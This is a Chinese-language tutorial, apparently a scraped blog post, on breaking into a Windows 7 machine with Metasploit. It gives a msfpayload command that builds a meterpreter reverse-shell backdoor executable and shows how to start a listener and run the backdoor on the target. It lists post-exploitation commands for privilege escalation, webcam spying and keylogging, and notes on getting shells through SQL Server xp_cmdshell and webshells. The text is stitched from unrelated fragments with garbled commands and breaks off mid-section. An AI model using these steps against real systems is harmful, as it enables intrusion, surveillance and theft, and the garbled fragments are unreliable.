如何利用metasploit进行漏洞扫描和攻击

很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣，针对这些以下业内相关专家就给大家介绍下，当下黑客怎么利用Metasploit进行渗透windows7的。设定目标主机为：cn_win7_x86_7601虚拟机，地址为：192.168.0.116；而本地主机就为：192.168.0.149。方法步骤一：黑客用Msfpayload直接生成相关的后门程序，如下图。sfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.0.149x>steup.exe方法步骤二：黑客直接就能进入所在的目录并将属性进行修改，换为允许以程序执行文件，详细如下图。进入所在目录，修改属性：选择“允许以程序执行文件”,这时候也可以做一些免杀方法步骤三：接着黑客就打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机，最后就能开始进行监听了，详细情况如下图。打开msfconsole，加载exploit/multi/handler模块，设置本地主机；然后开始监听：exploit-z-j：方法步骤四：黑客需要能将程序直接拷贝都目标主机中并进行执行。方法步骤五：以上步骤全部完成后黑客就能通过后门程序反向连接到msf，用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf，详细的如下图。Meterpreter就是metasploit框架中的一个扩展模块，因此的话溢出成功后黑客就能攻击载荷进行使用，一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道，这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。另外，附meterpreter常用命令：getsystem#会自动利用各种各样的系统漏洞来进行权限提升migrate#进程id进程迁移background#把当前的会话设置为背景，需要的时候在启用getuid#查看对方正在运行的用户ps#列出所有的进程getpid#返回运行meterpreter的id号sysinfo#产看系统信息和体系结构shell#切换到cmd的系统权限方式exit#退出shell会话返回meterpreter或终止meterpretergetdesktop截取目标主机当前桌面会话窗口runwebcam-p/var/www#在/var/www目录监控目标主机的摄像头keylog_recorder#使用migrate将会话迁移至explorer.exe的进程空间后记录键盘

卸载软件后安装时一定要关闭杀毒软件和防火墙，特别要注意要去控制面板修改区域语言为美国，否则在安装postgresql时出错，原因不知，这也是为什么头疼的原因...最后一点需要注意的是尽量不要用二级或二级以上的目录，比如D:\Test\Metasploit，放到C，D

盘下Metasploit即可。

在获得sql server的登陆权限后同样可以快速的获得meterpreter shell。

注意这里METHOD选项，三种方法都要使用XP_cmdshell，而第一种ps是使用powershell，第二种需要使用wscript.exe，第三种则要用到debug.com。 本地没有环境，就不截图演示了

others

不管是什么场景，只要能转换成文件上传和执行权限就可以得到shell。在获得一种权限时当然可以先google一番是否有可适用的脚本，如果没有再分析是否能转换为文件 *** 作和执行权限。如果可以那就可以得到shell了。 比如:

mysql and sqlserver ..etc =>file/webshell =>shell

本地同样也测试了下tunna里自带的msf插件，测试了php版的。代码大致是这样的

---